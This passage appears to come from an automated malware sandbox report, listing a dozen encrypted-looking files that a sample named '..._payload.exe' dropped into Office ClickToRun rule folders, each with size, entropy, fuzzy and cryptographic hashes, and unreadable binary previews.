                                                                                                                          Preview:.<?n..D:...t..]....T..l...h..Z..P.QM.c!.D.sG...o..."g.ht..J1.m ..f...<.^.F.......E<./.X.\.b.9.G.........q_..Cz.ur*....Yo6.....|.b.8y~.J.QXz,.o..n...ul...qN.&..".j...E3.[..o...E.,.6Xc.......$z.^6AzLp.......u.{....hFMOG...y.%Sb....lW.C.`.e:N..g..\.f.E.......=..4i..].|...V..!'H4.....j.[.......c.}...6...^SKPB...e.....\.R..M./.8J..HlF..JM-/<..%...6....>fl.e.cp..>.$.:Z.6t..G?..x. u...Ti.._...d....Gl.r.>.4.zC.n.#.......LV..f..........S@.D....;m...o.69.3.L....Y...j..IN...t..S.HN..~..".,f..)..%...{@...}..[9n..*.OQ:L.(.t.Yt..^..... p.......tc:...].5.....O.L&.ls.V&.'..... #.#5..}..m.....i0}...).y.........~.3.j.......-...M2l.Ct....K..|...bFY.h.qs.g?......:.pv.I......i0.bk!+.pw.1,^y.G...........C]............W...&.j..C.2.eq^U...>....F..e .O8J.y..uS....I\n1..!..;....:........._.g..b...G.7h5.;s.u@.=..tQ.....I.mR.$.....{....f..m....|.=.W."......V7.E.o..).....07/h.d..@.h.^...x...4w6. ...l&j}...0.4...Q .....:Dq)0...h.W+.6....w........3..*j....r....2.....aV.<mQj/.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703350v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1700
                                                                                                                          Entropy (8bit):7.884569128691815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:i3iC09ovpireOuHaNDWRa9z5NYw+8ITVS4c6YXUzlPPmdqK94kA7WpjcFT2/xdC3:vivddoz5FLUY4aUzlmx94khmsOROWD
                                                                                                                          MD5:889F3E211E0F4730FF986399D7390740
                                                                                                                          SHA1:C9FB3E3EB637597A993C81ACDC07CFD2A8CB5AD0
                                                                                                                          SHA-256:DAC1514C0053BF342BCDD47333D826E875A2287FE9BA4D10BBF672DFF831CFEC
                                                                                                                          SHA-512:5327298181187241188AA434ABDBCD182B140DA928D48E5D9EFD89596F378F9C1F919AAA6AAFFEB1C3ED78EBB85754D95B794FF6F79901EA248FA29A659A5B72
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.W.kY.....k.....:..K.h..l..q(.(.5..t.W..G$.....C..P..[.!..#..x..3.d.hC.T'xv'].>.nq..-.MO%}v...j......J^&.U.....s...s. .....X4.=).C+..!.E.+.1...z.J%W%...6...<....*..;...}.Mh..[av.GO.Uw.....,T.@. ...n.e..N...W.K.d.e:n...~...{...*O..."N.;..._.3..../L....)..../Z....Mc.=..|.q......%q........F......Q......y.`..#.QiPt..`H...K7CF^??n.F.W.w.....L[=..\.m.n.h..qn.,..L0.....*..G..S5.../.+.g0...mjT=..C..(...rc..k.V.'..7.".X\.......Y5v. A).1....en.A..v.,.......}`....4n%..}d..3s.r...D..D......C.[&..s0.A ...U.......,W..~.Q.lc..c............*.x...`....J.,J.u?...ul.G.[.."'.B.....0~E...&....P.Y....kE...2.....|.$u:.p>U..UQBe*....(.Cg.Ho.T8.e@N@....Tr.l..[J._....A.....t....}[..[!......+.J(...P.k..o....-H..G.Q..H..S..e.j.[}...F(.'..5.(a......7....z..Y.....Db.._.c...VF........d..M.Q. X-.:. z......46s.F..0...N......*..w^<efN.....P....#~..F.....XK..W.87S..)./d...D."^.?.R.Z..c.....3.9t..\.a.V-..e&gQ.....D..<...J....o..w.2..V...5. .of..}...O..._)........x.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703351v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.887252404563538
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8djQL6JKZhMPdoFuUaU9WFYzJibEJE7UeAd8D:Cj06JKZSPuoUYF1OAUeZ
                                                                                                                          MD5:B09BAD5A1B05371CFE918ADE6B0FD100
                                                                                                                          SHA1:5AA340FE480B974470B81E394631B5232B0893A9
                                                                                                                          SHA-256:B8A87AFB78C7625E97A8F635C7C5DB839BE592A4F344E28CDD1B5EE0D1B4EC58
                                                                                                                          SHA-512:CACFB1512E34F657EED1707F896083CC4694EE6C7B7C88F7C72A14A9493D376FB59C064CD721D7F742F91130278CBA62F089DF1ED29FB72DBD7072C67AFA622A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..J.X....._.E.....!..c`.:4\..}..&...`.E5!8.q.....Z9.."a.`.G6...n......z.`.n.^...SM~)....1p.a..l..@.........<..T].6.D.;.dq...*...(E....F|G.}...g....<.\.o....S.d+MP..F.SvnS~=.<q/...+..'.Oow.d.IG(...'.....u...-..+.X..A.....vd."arC.).#.mh....h`.<..@0.9oe$y..~f.?.zU.A!..x\..)..[.;k/..(S.....>....4v.-.lA..^O........EM...VTX...e..h...N.ml.K\D.....vp..7%c$.l.&.....[..>m..b....W.g.....,.y.?ca$l.vVm.. .Z..,..P....(..e.../......'.(!s....S.O......Z...w./...K. F.....p"LF.Sf(}^n..2.t..\&.....e..>P...1..a<jIxK....1.RD&.....=.`"..(\.. ....O..f..vZ.|Q:..I...*-7?....R..c....0*HNuK.mv...l..J]44..._z.x....j...........I:.3BnF..Oi...b P~..*.'u.t....S..{(D.xfT.....01.|:.f...+O6.....Q,....=.......-....ea...YmY..4.g+.._Jf.s....F.G....4.)....H...H....7.~.P...?...o.El..L.....rur.7.U?p.G.....t..7*.w.?C...kd1*.X..I..tp...$..JW.e.^..s.04...%.o.F.*.....V.<..8.q.T.c.W"..D.t@d<z'$.UM..|}.|V._T..c...H...Z.._.?.........i?.u...lU..1_'.".]2.|2j...5y.=I.f..9.V)[/.`...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703400v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1722
                                                                                                                          Entropy (8bit):7.903192549520889
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:KJX5srY/0jaqrzf7BLxWKOACLOjrRujD7fgJ/KD:cWrYMGozf71XOAqcrR07fOK
                                                                                                                          MD5:B7AE3E00B2B132BA5F1F28CB92295851
                                                                                                                          SHA1:3C2C2C06A1391E99B53D1DD1C46FDD98FA2F6E48
                                                                                                                          SHA-256:84CC00409E36A2A18B01D2685EBEB55DBF88E446259ACD4AA4D08B96D5D15849
                                                                                                                          SHA-512:F2DD27D203A00138DB44025F2C1058C43248CFD84D2E89D1DBEA45C6A87AC4343C76CEDA21E45B77C5DDE376DDFCBB0A9F01695E3970ED44B161256A98D3CC8A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..._..$.........-.J.....u....h.[x^...zCL..f.]....P.[........^...qU:p..g../2....B.l.&.y.i.4e.K2.T.{i6..v2t.v..._.Bp.i?)...<ry...j..S.eW..>?.Z...b.&e.84...K.f..}'..}..P...(E.k'....*.x.o..KN...$w..C.eQ..8V...`*.......[;(.c..g.MEo3-.i....*3..@..o....V..hF.J..X.j._....SY.`.....N.*...H.j./D..............e./....;.-]&..xF..$.j........+j.^...m....R...^m.HV..LfY.R..O.....RY...\`...,...L..5...xM...P.F......:.P..1+..v..U."..:.b{/4.,.+/...r.._. ....\.iR...R.Q..W02R.......]+Dte)V..{......,.#[<.+.......~".i.r...z.'2%..M.....X>.l...S.{....].b.K..]}6.I7...[.$...m...e...P.;.*./4...l.Y.V.P..))........>......I.~.. g.H.t~m.c.x.C..W@....}.*.5..}..)...].F.....!o....H...E.i.u......c.....:.=.......l|.P....qTM.............."uU.D..0(.N....@. A3}].z.rB\.......r...9Cr..a.)....T...>.Oq.....}...c.3....A..b..6z>..z ...a.h...t'S...v....=Y.vB..V.....4...I. .{h..0..F.....e...<.....%K.b..*{._C.~@......p.`%...2r'......!...........:.....).yi....Jm%...............pg..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703401v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1759
                                                                                                                          Entropy (8bit):7.8972457860063106
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:19YmwSW85sFOfw2FZndPy7od0Im0x9GVcwDNPn0PeapLn18q6srqTCxh09dHkhV5:XH5s4I2FZdC0x9GVpDaxP62A9Kf1VZD
                                                                                                                          MD5:1E85A534A40277729395A0EC59FF306A
                                                                                                                          SHA1:952CC4AA1314376C0CBAB511CA08B07FAFBFF3EA
                                                                                                                          SHA-256:AEC14AD6DC2B35B3162A78506EDC416CE9A3535F4BF5FCCE2F28D1A292C7B2F6
                                                                                                                          SHA-512:D428F87CFC0DC05F5C2DAA2E1F27E7ED0015E7B1C6266B67731745DB3FC5C31B520C4C1FC3B34FECD4756612A4ACB10F1A5F968445D91371AC7A8BFF482DA39F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?$z./.7..3Mo.b.......5....!...^VG.C6r...`.e..Vj.W.+f.Y...Z.y..@Hf.>....o.....E..t.1.Pp..~.X.D.<g..6.6...s8(.{' ..Kh..~...h_..`4..._..9....|#..."..31.........!P@."...'u6...%m...8....T.$..I.....>wX3.l"....W. osT4...F..P....o...:.!..'.1..3...(.LR.s.m#KrO..W...ia.:..V.....yG....o.-4.c.A...@.C.^..=.FB...T[be..*....U.bd..2...?.O..O)..<...[...2.$b?r;.U.O...8...i .......QZ.[..n.......0V...H....j.]...G.......LfA...Q..@......<..?..uo....My~m..#.$y.s..X.&.|...~..v.<..7...#.l...P.e.o.V.w.3.n......... ..-...k...}.0....q......r.......r.._.%O....1..O..>.7..37.....K[....db..Q...5..ut...x.K[G.$R-|.az.7.AH\.^........21.T.B.....+......'....&K5Z.N.".......cT..Pj...-M..z.1+.X...5s#+..E.Z.P.....'o*...V..e^sS.5.<.L...0.....p...WU..s.|.s..K]@+...J..d.O..........@..f"..-.e.#.&..>.*S+.F%..s.j.F. |..]yF)R.5.G......5.|.`4./.Q...W,O..u.]k`..?.Y/^.2.y.w{..fh..(6....L...3.*.W.b..m\@k...,...E..Y....x.~X.....O.D.r.......F.........#d7...........ou

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703450v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1706
                                                                                                                          Entropy (8bit):7.883858545772469
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dR7KvcOC0iIAXS+VHpAkJkD8LReuUBvV0eDx90H+NkisPYd/apWzRo7IRyZMd8+z:aEr0lAC+xpAq7UBZFCYdipWzR8kWifD
                                                                                                                          MD5:810182AFA4C00E38CF5507898C6A7900
                                                                                                                          SHA1:C68266CD7340452C49E63A0939A28CCD11230498
                                                                                                                          SHA-256:9FE6EE5652B908A89A05EBC08022EEEA25E76F26EE9D6A5071310685A802483D
                                                                                                                          SHA-512:99B2A6DE34ED5AB0F8D2DAFA0163113A409E53210E8A84B85830CD77DBB06CFFFAA175A9027EBFA138A32623556CB3FA93BE6C77BB8D23FCB622F4126C13FD93
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?V....>....2..s..bpq...........S.IC.\Tah..y.3.......%*....."...C.d[G..].7.o.^x. <..u....U....t.w.4.c....H.9.....s?m..B....G.Z....ie.q..J(BQ7In;..SY.]).............?.....t..J.. .f....5*...ln.!.....)D.K.V.;5.s)|9.H...er='*Z.....5.g...C..........E.0..&...DZ.v.....$2.....Y.cV+..#..9......=me.....^.%.Z%[.......C......X.R.+.i=D..w2.N...4Zh(H.&.....#..x..?V.U[~Z.>..u.$x{D....L.^@.'...3...7.A...%..9..?..w#...Y......d#..u...cI\a..l......*cO.."..P.|..tW.e>\....3..f.^.i..;nY+C.~.z4p.-.7.....m..^T7...;D.c(....{.=<.gA@....S....CP*....M.?..).......1...0)G....Ym...e.H...;X;z....yk....x7..Hc-P.BM^..$...7..Q.9...{.V`.c&j=j.".Y m.o..U..f..Ox..S.....s..1.Z.".;b.'...H.A...'.).E..Ja....T.Xz@.Z[.d.2.5.W +....U..h3..N.q.\.dQ^jsch.....b~t..{]..1]...u..w... e.F...f...7.5......b.vH.e....].p.M..v.el.2...Eg...."So..QQ........q-A.H..m.|.0j...q.R.I.}.>G...<f'.Qcq..'.2...K.M.U.N.~.~'...3j)Aq.>....#.%U./.X....Q.....(..C....U.o..'........$...r.....R...%......Sx

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703451v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):7.889296502342754
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CF8Qip5YDBWQq9gGiKfu2xzBT24sO9JJ4Ny1D:Y8DpGDBvGiNSlmQ
                                                                                                                          MD5:06100E0F775F7A750B20F6B1C5BC47B2
                                                                                                                          SHA1:4A49BDC981EEBB137B987C17B0F6FBC797175BD3
                                                                                                                          SHA-256:78592B3D731F0A350024EC9D6640A06F0CDB5E93D86E0A8CB71A363F7248FA5B
                                                                                                                          SHA-512:A759AE5ED87B502E37226D0FBA6253C7BA0FA37DEA32A6C841AE80B065C4695E5E16F3EFA1EA37DC792C98BD17DD1EDEDDF4F8D1B0087ED0C0BFE5276A64D44A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...F.s.2..i8.d...|...A+....hy........Z.Kr2.unNl.I.... .....[...1.....nS..%~..B...Y.....~# .l.0.....$....2$.....1.j..J.RK1...|.....D.?d..C..(...WFD@2.g......s.=b.(...0}..SGBIh|l._.'.p...Q.A...z.:...5...0c.6...........7.u....s...m...b .A..5..E.F....9..(k.....Av.w.j[......g<.X,.....I.M&.`.0_J.T.ml...e=...u'?...6.H.f.6.G..0^*...Z.P..I.N....9....(..T..$.?..J..[0R..a...............k&...].S....|.K..7.>..4...8m....*.M.|....7t.D=..$.A....?.}...[..Y.)....J`bWV..P.<...~.....W.W...M.g....y.h..3..,.,.(...5.:`<.........L.A..$...f5.4._ .....|.~c..u....`.*:IAV.wE.Ao.....tA.`p......"..Tu~..(KN....O..9M....\{.-E}_r^C...?....n........G....:U.Jt1.R.x....Fu....+:..].I.|WH....Ob......i..?.m.\..r.Y4.n.........<S.PW.x......w./0T...=.c{...Vv.).>...K.1.._H.......K2_.c!...~b+]y.....m.....!.j..N.....l.m....../..K..e.e...q.B.G..,p.}...<.{...~...*....uZ...1........M].[.#RZ_.#..m"~;.\.T.P..3G..f..5...#%WD^"K^+.Be9b..P.).....i.}"....r..K.0z.....T..0..{d....D#.HJ$.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703500v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.872371438010367
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:aw43K/h98Z/VbQqU76ynwEewgC4eJhg5cT6CDtM4C5sp/T6Jp5MPTELD:IST8Z/VMqU76OwHCwY60S1M/T6v5ms
                                                                                                                          MD5:41E87FF37A566475DA177ED084D5757B
                                                                                                                          SHA1:CA68CC7E9769837D396CEDA59052A09CF815F262
                                                                                                                          SHA-256:01D44028E34F8E6EAC08A5B97991EC5AA79795B1315AA76545AE225339A3CB77
                                                                                                                          SHA-512:BCB176089A49594976BF14E545B0451892DDF27524D8B4A507F9CD87D8634FD2B392CFA4D2276B3964A4A20549938A9CDA74F068F61E17C8952033E75EFC5938
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?J)>...u1....H.*..a..Y...V4q......X.....G......I.E.B.h.....JC.......rp-uSWd.C\A.X..C.1m...)...>..v..*.Ui_.j..:O......$......S{.P.@&t.R......+.>...O.Z....s....;6...o.Le..L.o...(.$g?-.5,h.....-.~.ZvG..M...F..6jLx......./$.OT{.m0([...;..?j..B...|./E...oN.-w..C"....r..R@.aU...W.'..:.Q.5.?.......K.:..2...,+..,.Gr.T.y.~IG8..xN..Re...F...0W......(.o.O..b1.....X........FH)...S.[..2.y....J..S.. wK.:..,.F..E...h.^*...Y.}.a..`..".a.F.|~v...`.u`..3].._,..6;t0..........e..7...,c .........../BB...r."h...+H}&.Hh.."E..3.]..G~......b!...R.Aq.L..62v...'.mV.._..<..BN....]..d...f.o......,..8....... nP..V.E0.|..,.......syA.%;.b%z.@..J/.t.0v.^M.w.=...(g.?x..){.,.StT..6~C.....+;..........XK..;U...D.;..n.Z.:.......$V.=.7,....B.....<Y...h......].G^.....\...%.5y.._>...:.G..|......;,.A....A.V<.....LP8....a../.+0/..VP...HF[|.%...>..M.}.."'Wnp..+.....C.n....g5..rc..SQS\R|.....@y..-....rdJx..%_...w..8l..%o)..x..o....M.g.~...:...es...."..zf.....~..+y).w0P...'urs2..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703501v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.87072579312873
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:18nSUcfDOIVynqu/foLqOA9boMNQOJOUD:USUcfaVnqQfoLqOA9bVROA
                                                                                                                          MD5:FF935C7687E4913E651530587C609561
                                                                                                                          SHA1:214B6D2289A3A837BF09FEAFC0123CB771D1AE93
                                                                                                                          SHA-256:8B4561D9590FB15A8202425F60AC84F2F4142CB879B6AE208DE2C5A4193F6650
                                                                                                                          SHA-512:7CB78929CF5C7768ED7EA9CD26D5C0E3522480AC28DD217FBF4112B509205E2869D189650C7B99D652CA2A6D1E243FDCBEF836B72A6933F6EE15C77DB6E141A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.z..29......h...B...2.;.."..]Wp....+.oTr.Q.P.....(.._....x..9.0..Yi ..c..?._f,j...{|.W..~...[.I?5...~N.O....w\p....\.J&...y..}`F.. W.....I..`......)RF...J"z.O!...t..t..9w....h....R...'..Y. .n..p.e.....u."...LN....EuZ,PjB&..........V..-,!....7.3.D5..4.q.f.S...S...f...y..0m.X.7..\....7.+.....a.BD.e...N..Y.l.......m)..Nf.4.....W..:%..(..-@D..O.!.K....,...8.......{.......?.J~..+-.....o.WS....T..A..1P....z....rt..M.C.Mf.b.S.ml..."..[U...K.Ce."..qN..p..6..c+[U.....=8.!. ...*s....i...`..I.g......U.U%....I..:.,Fn.........D.f...f.ym..F%.&...]...g...y+.:....3E...C..Q>..1.ll...'.nVu.Z.K~......\.xL..D&..W.N._...E{..lU{...E..8...8..k....<L?b..a.r.yE0.+g...N.....p.....Z........Z+vr.......B70.....:.{4.O..TbCV....r...*......4K..*q..7..g..NIP..R.b.:...B....h........M2c......5mn..2..C..&(.E,i...M.W-.q.<.....N.!...8..|bXK......6<....6I..C.Z....."....'.. .< ....d.yN..d.. -..7H.'.^..u/A...Nu..U...-....y-..#.....Y....\Z..J4..%.p.|.>Nd...M..u..5j^..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703550v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1706
                                                                                                                          Entropy (8bit):7.884235977096016
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:jRMoftQHxCrDaKdumb/bSAVinfcfxWtj69zQeVczcD:OwtQRCyIPwnkJylzY
                                                                                                                          MD5:C17C9560AC06F10D72A50A99584FBCE9
                                                                                                                          SHA1:AAA45965457093E448E465C1FD62F0A9E8C9A828
                                                                                                                          SHA-256:5BE324C9A75AD355D6EAC886CC7E7FABF3E2F609870361B2ACCC3068F20201A7
                                                                                                                          SHA-512:77DC07C7386543C3330B2334D5AAB29C6348E7FD6DE0FD8BD742FA4F09A0E757AD90C11E0E9122C6C06C5C6023C9ECE7ECF332EA95298F8814BCE87B5C60804C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?........U.0W....'..&..]5.k.......oy.Q.......bN.....i..[.v@.BuY.=...l...%.^J8s.'.$^..f...?.I.,3.S.E.E.'...8.+u6;... &=q.`F...xB..:....j.....Qk..>.....(o.I.OY0+....}........9.RUI/J^.3..LG.Ii.J.>..0Q.<.!C)c.~.!..!~..KY.._W..5F.......l(Dw..F.Ta..*..y....#...j.]...M..@.O\..P%...LrP.E.|..._sw.<..Jk...uq.j.e........ ...,f%.s.d.>v..L..~...[...~v.(...=....t6.8.]..r....'x..+..,.V....6......^.%.x.A0.A.5.oZ0$o.z;C.Z.0<...D.{Tz..m..=...p..'.yi.}.Y..(.t....$.......2..1.1..}..j)..#6.3...G%.9.b..51.+.....:...G........T`5....1...kN.......H.6...v.|,.M|..Rk...M.i....q....Bt...N.R..u..0.~.^*e.bl.....g.../...z..J3.7...7a.....Yy.qQ...k..[.j.....:.H..B..x.S.`lo"^z^.3<.._..rQ].a(J].!H........kYi,..Yu..l..m$.$\.L.)X....^&.mk}.A....z..!).B...l.A...e.....e.....cV~..ya&.u.?.q..T4&..._.. f..U...].... ..."107.z.G>.q...0Xk..D..sKJ....l.......m....j..[ t...A.1[.^}.t..:......C~;.]..+.-..5.b.....-S/......e..'ci..C....`..c.U|..=...{8.}gJ....#,N.........V......r.._...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703551v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):7.8907292171628445
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:G8EyTrBLssiJVylKmvw1wUgQFP+hQXGy0ybaRPJY+pnmCrwea4+A+8hb7C4Bev+N:G8Xp3iJVy+jFxGquPJ/gCrtZ+Y71D
                                                                                                                          MD5:16786919C11D9558ABD9753D74B0486D
                                                                                                                          SHA1:EC368FD852121003D933196AC73B417335B053FC
                                                                                                                          SHA-256:93DA26D89A32C1C0BACD6C6A5CAF62F700D32ACCFE81B5D6A47DBCB1D96EAA9F
                                                                                                                          SHA-512:1959D36CCCD50F4BCBA2057F1D276E3FE82DEF5F951C5CDCE131A56721EDC55469D0B850813B297609912D67BFA4C98A7528E9EC4F3AFFF9969CCBAB10381C1D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.[Z..F...............a..!y.U.QS....n...5.1&.B..^@(.?P....@.1q;...p!.._.A.Yl1N[..4..=5}&.S7."/R..........Od....V...........s..F....-.`.Z..SE....x9..$.GrG$..^...E............S...*........j.r.;_e.#....h.>\p........t=..O$.<`+...6M.+........?qS.....S..t.7.;l....C7....../.K...?....-..-}.AM."h...}.."..._vhh...c..f.....-...ZQ......#>..n...V=X.s..J...w.?4.aO...q.(1{....|..1....*........h..s.....g../..{..2...-l.>bFQ..n..iy..x.1...4..".k?WV*.....^..J...!T.*...l...S."I...L.$....9V.... /..?..x.R.J2A.T....&...|..H.L@S' .&.s.N....#.|8k ..!j#.S[8.v..k....)2]2..W.~.........$...-n".|.g.m..:......P...!".l}. ...#...F.....W.r0.s}.....$...a,N...I.........n|.ZZ.:.v....H...I.ss....h...'..=.j U` Y.....v.`.W..Zsx[.=dI........w.R.>@v+|....3.>4..-.p..$..,@....p....l.. ..z.[....(...........2.()6P....I...[p.d...aV[..i|X...{.'..Fxo....E.......%..&Q..4.Q...(.}`5;Ot'>.`......W....+X..b."+....;..H..k..C.`...X5...Vd...1.:..c.u4...9,..R...I.\.l]-.i.......<u....D..v..%.]

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703600v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1692
                                                                                                                          Entropy (8bit):7.904927963403925
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:o1jpJOuG1Fmsg2EACIDv1g8DC6y8660M6/D:qjpJRGNEzyTtyQ0Tr
                                                                                                                          MD5:C65253C8B4399BC9A7F08FBF81B1D8AD
                                                                                                                          SHA1:939E8B8D74CEFBC2A3145500E98DD381DAC1F5B4
                                                                                                                          SHA-256:1F49F512D820F932F888E5358FEA600BE49E7B087970C2860C5D30953390A9D0
                                                                                                                          SHA-512:EC698E7D98CEAD772D1293A2286D9521759536E02F7FFCB98084ABED6F3230231058FCD0BB894CFDB4B877F548DAFB4F36486F9B691DF695DE3D3775FCE613BB
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...t.v.....e/3I..._n...y.#c...7..:.~{)B..?.H...........yF.. X.MB.p(XnPk}.7[..P.....x2.%d.%H/.P.hT..W..B.&.X...S2...rs..F...k.....M...q..n<..Z..=.......x........U.....Q.\.=..Bv.C/Fc.S{.q.s^R.?5.<..hs`.H.._n`.........t.H..&..x.#.1!Wk.#...`".$e...{.W2..SZ.(...H...Gz3.4...z.h..1.K ....."..].(i...\z......b..4...%B...t.......WX_.F{..}..a.,Py.t.s.q..b.G....lA;...9qs.1.*.....F....z....;..].1v!..g.........4.Kvb..{EHQ.......|@....w.R..J.\...+s.X.....t;l(...j.+.. gs.f..F.>.q...>..p....7..4.j.a....^.>..9...^.g.*.........^1c.F~..B.;b....,.,k......Ca'....VfV.1.....K..b...../..K.qd(w.M..)XO.5t.X........s ......Z..W....8.%..3`/....h.....G...r5~....*Q.S....Yr.i.}../..N.....P.^,<.....F...a.=x.."V...<.V.`4....%.^.%L..EgM|^..Y....[=....o[^%d......QX..b....VU...u..V.5..w..:Je.B....>..s.>S.+*m..v.>...O..........H.J.Mz....fMX.8...y.#....l.x......H7.p-;Lf...g.V.>.?&...s.Y1......[..G-|........\.V...0x.p.,.q{....J..qx..E.v..q^.$...^...p...IQ.f.N.LdO

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703601v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1729
                                                                                                                          Entropy (8bit):7.880908627637564
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CQNO7QN04aXijfpwNBCxhs5aphSbaZ/UGn1ED:fq42ijfGvCxm4Ob0/d1Q
                                                                                                                          MD5:D99C781DA7A61E71F9A88A02B0D6E175
                                                                                                                          SHA1:FA7091ABF2B1DA03A83343400BF3AF29F2B12D09
                                                                                                                          SHA-256:1F6CE7800E7974FD5F2FF868BAA638F4BDFCAC4F3C8591D2FD3341B881E8DAD8
                                                                                                                          SHA-512:794C7DF7939C9A6368DF8C065F3CEB8FC455E4E9AB3B03D3B009BF4732120EECAA3FDE6EE0CC454FE40C62A7F5FCCC62E4F11AA22F9B748660A3D1D6FD15D0E0
                                                                                                                          Malicious:false
